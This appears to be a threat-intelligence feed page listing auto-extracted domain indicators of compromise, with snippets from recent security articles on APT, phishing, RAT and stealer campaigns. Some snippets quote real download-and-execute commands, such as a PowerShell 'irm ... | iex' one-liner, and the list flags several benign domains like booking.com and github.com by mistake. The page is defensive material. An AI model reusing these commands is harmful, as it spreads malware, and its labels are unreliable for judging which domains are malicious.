ZeroHour

Indicators of compromise

1,796 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainasp.netis a .NET-based implant designed to blend into Exchange and ASP.NET activity while providing command execution, proxying, sockeNightEagle Hackers Target Russian Companies Using GhostContainer Backdoor
GBHackers
· 1h ago
domainadtarget.complain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an advertising domain registered in 1998. The lookalikeWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainadtargett.comick marketing review. One delivery host hid in plain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an advertiWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainbooking.comects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific target sites, so they stayed tWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainbuking.comink rewriters, and redirects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific targeWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domaincdnpps.usSeveral embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside thWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainhanstrackr.comnet , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside these disabled modules. On the shop, the actWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainjullyambery.netdomain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older captures, what those endpoiWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainscrprime.comto change its behavior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remainedWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainsugabit.netd turned off on this storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainvotetoda.comthis storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com )When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainyouronlinesearches.comhavior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older captureWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 11h ago
domainasp.netxtraction of cryptographic keys used by the server from the ASP.NET configuration, followed by overwriting the VIEWSTATE framewThree Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers
The Hacker News
· 15h ago
domainipapi.cobtain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database, and recovery mThree Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers
The Hacker News
· 15h ago
domainipify.orgommand Prompt, obtain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database,Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers
The Hacker News
· 15h ago
domainbackblazeb2.coms using the following command: powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip C2 communOperation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH
Zscaler ThreatLabz
· 15h ago
domainindiatodays.orgconhost.exe --headless powershell.exe -EncodedCommand [irm indiatodays[.]org/pv | iex] Create scheduled tasks that execute payloads atOperation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH
Zscaler ThreatLabz
· 15h ago
domainbjssourcing.comrs of Compromise (IoCs):- Type Indicator Description Domain bjssourcing[.]com Lookalike sender domain used in the procurement-officer pGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 16h ago
domainelitechiropracticandrehab.comcrypted redirect destination Domain account-access-rc3uenqi.elitechiropracticandrehab[.]com Device-code phishing server hosted under a likely compromGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 16h ago
domainflipbookonlinevault.coment used as the document-sharing lure URL hxxps://chartered.flipbookonlinevault[.]com/scanna/200e61bfe54c92fb720c77c3a1661bc0/b5ea87c2ddac3aa14GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 16h ago
domaingreenlightdlstribution.comender domain used in the procurement-officer pretext Domain greenlightdlstribution[.]com Related impersonation domain registered during the campaiGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 16h ago
domainvoewo.comtered during the campaign period Email address jeremyarcher@voewo[.]com Disposable address associated with registration of a relaGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 16h ago
domainmanagedkafka.heyhru-server.cloud.googf the indicators listed in Anthropic’s report was “Backend. managedkafka[.]heyhru-server[.]cloud[.]goog, the operator backend hosted on Google Cloud.” SinceThe sexy AI-powered dating app scams are here
The Verge · AI
· 16h ago
domainverify-cloud.digitaldistribution panel associated with the listed domain Domain verify-cloud.digital Domain resolving to the ClickFix distribution infrastructurHackers Can Rent VectraRAT for $250 a Month to Take Control of Windows PCs
Cyber Security News
· 16h ago
domainairuhuo.xyz8178b9dce62a482 Source-listed Noodle RAT sample hash Domain airuhuo.xyz Source-listed domain indicator IPv4 Address 64.118.132.233Hackers Use Cross-Platform Noodle RAT to Secretly Control Windows and Linux Systems
Cyber Security News
· 17h ago
domainshdufysuf.comdress 64.118.132.233 Source-listed network indicator Domain shdufysuf.com Source-listed domain indicator IPv4 Address 191.223.42.34 SHackers Use Cross-Platform Noodle RAT to Secretly Control Windows and Linux Systems
Cyber Security News
· 17h ago
domainbjssourcing.comsuggests scale. eSentire linked the observed sender domain, bjssourcing[.]com, to more than 30 recently registered lookalike domains imGhostCode Abuses Microsoft Entra Device Enrollment to Maintain Access After Token Revocation
GBHackers
· 17h ago
domaintrsb.top(IoCs):- Type Indicator Description Codebase family string trsb.top String referenced inside the JWR worker and used to identifSmishing Hackers Can Watch Every Keystroke as Victims Enter Card Details and OTPs
Cyber Security News
· 17h ago
domainverify-cloud.digital53850). 86.109.75.161 ClickFix distribution panel, resolves verify-cloud.digital. 178.16.54.148 ClickFix panel serving VectraRAT and NetSuppVectraRAT Malware-as-a-Service Lets Hackers Bypass UAC and Hijack Windows Systems
GBHackers
· 17h ago
domain17dlz.cn.154.195 Sending infrastructure IP address Sending MTA mos1.17dlz[.]cn HELO/PTR value for the sending mail transfer agent Bulk-mPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainaidenllc.comRelated lure domain in July 2026 waves Sister delivery host aidenllc[.]com Related delivery host Sister delivery host gov-xnui[.]comPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domaindgdskfds.uk.ccd38 Related sample: Tax_Notice_99674.img Sister lure domain dgdskfds[.]uk[.]cc Related lure domain in July 2026 waves Sister deliveryPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domaindownload.phpng location Payload / landing URL hxxps://dsfgssd[.]uk[.]cc/download[.]php Download endpoint for the payload Tracking-beacon path /aPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domaindsfgssd.uk.cccn Mailer authentication host Payload / landing URL hxxps://dsfgssd[.]uk[.]cc/ Initial payload hosting location Payload / landing URLPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainekl1-neettr.bondaddress used by a sibling sample Related certificate domain ekl1-neettr[.]bond Domain linked to the sender IP 155.94.154.195 Note: IP adPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domaingisudyawz.inkxin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Domains resolving to 103.23.172.15 Sister lure title कर दPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domaingov-xnui.comt aidenllc[.]com Related delivery host Sister delivery host gov-xnui[.]com Related delivery host Sister delivery host xjxfxn[.]com RPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainhsaui.ccIndicator Description Sender address / DKIM domain dfgfasd@hsaui[.]cc Observed sender address and DKIM domain Sending IP 155.94PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainjfbcea.comost xjxfxn[.]com Related delivery host Sister delivery host jfbcea[.]com Related delivery host DGA domain cluster tzawccsw[.]xin ,PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainpzisiauywa.xin.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Domains resolving to 103.23.172.15 SistPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainsmtpman.cnthe sending mail transfer agent Bulk-mailer auth host smtp.smtpman[.]cn Mailer authentication host Payload / landing URL hxxps://PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domaintzawccsw.xinhost jfbcea[.]com Related delivery host DGA domain cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pziPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainxjxfxn.comt gov-xnui[.]com Related delivery host Sister delivery host xjxfxn[.]com Related delivery host Sister delivery host jfbcea[.]com RPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainzasudtytw.xiny host DGA domain cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink DomPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainzixhasda.xincluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Domains resolving toPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domainzxizusuy.xinm Related delivery host DGA domain cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gPAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks
Cyber Security News
· 18h ago
domain11168833.comersonating an investment platform Casino domains 80074.cc , 11168833.com Near-identical casino sites using different branding CasinoHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domain11170011.comhe researchers’ comparison of lookalike pages Casino domain 11170011.com Illegal Chinese-language casino site using impersonated braHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domain1862.ccently active casino-site examples Redirecting casino domain 1862.cc Casino site that fingerprinted visitors and redirected themHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domain312zym001.ccntical casino sites using different branding Casino domains 312zym001.cc , am125.cc , 843470.cc Recently active casino-site examplesHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domain80074.ccom Site impersonating an investment platform Casino domains 80074.cc , 11168833.com Near-identical casino sites using differentHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domain843470.ccdifferent branding Casino domains 312zym001.cc , am125.cc , 843470.cc Recently active casino-site examples Redirecting casino domHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainam125.ccites using different branding Casino domains 312zym001.cc , am125.cc , 843470.cc Recently active casino-site examples RedirectinHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainappcasino.onlinesite promoted through injected comment spam Redirect domain appcasino.online Domain reached through clicks on dragobet.net Scam gamblingHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainasg78.commbling site advertising a deposit bonus Casino decoy domain asg78.com Chinese-language casino domain observed loading a suspiciouHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domaincache-cdn.orgated PeckBirdy domain used to collect connections C2 domain cache-cdn.org Previously identified PeckBirdy domain with VirusTotal deteHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domaincache-mcp.comm/layer.js Suspicious payload loaded by asg78.com C2 domain cache-mcp.com PeckBirdy command-and-control domain embedded in casino pagHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domaindollycasino.coming 1862.cc from a Japanese IP address Scam gambling domain dollycasino.com Scam gambling site associated with complaints about withdraHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domaindragobet.neth complaints about withdrawal problems Scam gambling domain dragobet.net Scam gambling site promoted through injected comment spam RHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domaingithubassets.netVirusTotal detections Possible typosquat/C2-related domain githubassets.net Historical PeckBirdy domain that may also receive accidentaHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainjs.cache-mcp.comng a suspicious JavaScript payload Malicious JavaScript URL js.cache-mcp.com/layer.js Suspicious payload loaded by asg78.com C2 domain cHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainmcp-source.onlinemmand-and-control domain embedded in casino pages C2 domain mcp-source.online WebSocket-related PeckBirdy domain used to collect connectiHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainpuqxr.comino site using impersonated branding Investment scam domain puqxr.com Site impersonating an investment platform Casino domains 80Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainrealz.comambling site using misleading branding Scam gambling domain realz.com Scam gambling site advertising a deposit bonus Casino decoyHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainvip311.ccoperators can hide. Three casino sites from left to right, vip311[.]cc, zzyud[.]com, zenplay77-x[.]space; vip311[.]cc is associaHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainzenplay77-x.spacecasino sites from left to right, vip311[.]cc, zzyud[.]com, zenplay77-x[.]space; vip311[.]cc is associated with PeckBirdy (Source – InfobHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domainzzyud.comn hide. Three casino sites from left to right, vip311[.]cc, zzyud[.]com, zenplay77-x[.]space; vip311[.]cc is associated with PeckHackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites
Cyber Security News
· 19h ago
domaingithub.coms and archives were disguised to look legitimate: https : //github[.]com/mirror-js/mirror-js/refs/heads/main/js/js-webpack.zip httNightEagle targets Russian companies
Kaspersky Securelist
· 21h ago
domainferncore13.comin Figure 2 retrieved a Z-shell (Zsh) script from hxxps[:]//ferncore13[.]com/curl/608e70d1338612686917ee5cd300ff7ed8e318dfd787a50257f9Atomic macOS (AMOS) Stealer Activity
Palo Alto Unit 42
· 21h ago
domaingetmacouscloud.comng to have installation instructions for a macOS toolkit is getmacouscloud[.]com . An example of one of the pages is shown below in FigureAtomic macOS (AMOS) Stealer Activity
Palo Alto Unit 42
· 21h ago
domaingrove-89.comm the payload returned from the initial download: hxxps[:]//grove-89[.]com/api/metrics/run?event=pasted hxxps[:]//ferncore13[.]com/2Atomic macOS (AMOS) Stealer Activity
Palo Alto Unit 42
· 21h ago
domain17dlz.cn[.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth host smtp.smtpman[.]cn Note: IP addressePAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users
GBHackers
· 21h ago
domainhsaui.ccpromise Type Indicator Sender address / DKIM domain dfgfasd@hsaui[.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17dPAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users
GBHackers
· 21h ago
domainsmtpman.cng MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth host smtp.smtpman[.]cn Note: IP addresses and domains are intentionally defangedPAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users
GBHackers
· 21h ago
domain11170011.comity casino websites in this network. A recently active site 11170011[.]com featuring “Venetian Macao” branding, translated into EnglChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domain80074.ccLanguage Casino Domains (Type 1) 11170011[.]com puqxr[.]com 80074[.]cc PeckBirdy C2 and Decoy Domains (Type 3) vip311[.]cc DecoyChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domainappcasino.onlineScambling Domains (Type 2) dollycasino[.]com dragobet[.]net appcasino[.]online Illegal Chinese-Language Casino Domains (Type 1) 11170011China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domaincache-cdn.orgly three. A previously identified PeckBirdy-related domain, cache-cdn[.]org, had 13 detections illustrating how visibility drops as oChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domaincache-mcp.comembedded JavaScript associated with the PeckBirdy C2 domain cache-mcp[.]com. The script registered a service worker and connected toChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domaindollycasino.coml pattern. IOCs Category Domains Scambling Domains (Type 2) dollycasino[.]com dragobet[.]net appcasino[.]online Illegal Chinese-LanguagChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domaindragobet.nety and unworthy of investigation. If you search this domain “dragobet[.]net” on Google it quickly becomes clear that someone ran a blChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domaingithubassets.netis not automatically evidence of compromise. In particular, githubassets[.]net a PeckBirdy-associated typosquat can be reached through cChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domainmcp-source.onlineervice worker and connected to another infrastructure node, mcp-source[.]online, through WebSocket communications. That layered design maChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domainpuqxr.comgal Chinese-Language Casino Domains (Type 1) 11170011[.]com puqxr[.]com 80074[.]cc PeckBirdy C2 and Decoy Domains (Type 3) vip311China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domainvip311.ccthe threat actors have refined the camouflage. One example, vip311[.]cc, presented itself as a Chinese-language KY-branded casinoChina-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites
GBHackers
· 22h ago
domainapi.telegram.orga space after Windows , used for additional payloads Domain api[.]telegram[.]org Telegram service domain that should be investigated wheIranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware
Cyber Security News
· 22h ago
domainbackblazeb2.come domain that should be investigated when unexpected Domain backblazeb2[.]com Cloud-storage domain identified for investigation DomainIranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware
Cyber Security News
· 22h ago
domainiproyal.comio Cloud-storage domain identified for investigation Domain iproyal[.]com Proxy-service domain identified for investigation DomainIranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware
Cyber Security News
· 22h ago
domainlightningproxies.netom Proxy-service domain identified for investigation Domain lightningproxies[.]net Proxy-service domain identified for investigation Note: IIranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware
Cyber Security News
· 22h ago
domainstorjshare.iod object-storage domain identified for investigation Domain storjshare[.]io Cloud-storage domain identified for investigation DomainIranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware
Cyber Security News
· 22h ago
domainvultrobjects.comom Cloud-storage domain identified for investigation Domain vultrobjects[.]com Cloud object-storage domain identified for investigationIranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware
Cyber Security News
· 22h ago
domainacrobat-updater.comn[.]online Earlier campaign extension-hosting domain Domain acrobat-updater[.]com Earlier campaign lure and payload-hosting domain Domain lKREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domaincodecaudiog.siterastructure associated with a related KREMLIN branch Domain codecaudiog[.]site Earlier KREMLIN campaign staging domain Domain codecvideoKREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domaincodecvideowin.onlineudiog[.]site Earlier KREMLIN campaign staging domain Domain codecvideowin[.]online Earlier campaign extension-hosting domain Domain acrobat-KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domainconnection.upgradeonline.site51a9b9 PowerShell extension-installer implementation Domain connection[.]upgradeonline[.]site Loader beaconing and extension-delivery infrastructureKREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domaincremeb.comitily[.]workers[.]dev FrameSync campaign C2 resolver Domain cremeb[.]com QR-extension and earlier KREMLIN campaign infrastructureKREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domaindonalurdesconfeitos.sitextension and earlier KREMLIN campaign infrastructure Domain donalurdesconfeitos[.]site Earlier extension-delivery infrastructure Domain marialurKREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domaingranderevolucao.storeyfans[.]net Network canary domain checked by KREMLIN Domain granderevolucao[.]store Installer payload-hosting domain Domain volmira[.]site ExKREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domaingraph.checkeligibitily.workers.devnline Exfiltration and fingerprinting infrastructure Domain graph[.]checkeligibitily[.]workers[.]dev Extension endpoint resolver Domain luizestrelhashapr[KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago
domainharialurdes.siteialurdes[.]site Intermediate KREMLIN campaign domain Domain harialurdes[.]site Intermediate KREMLIN campaign domain IP address 178.92.16KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension
Cyber Security News
· 22h ago

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.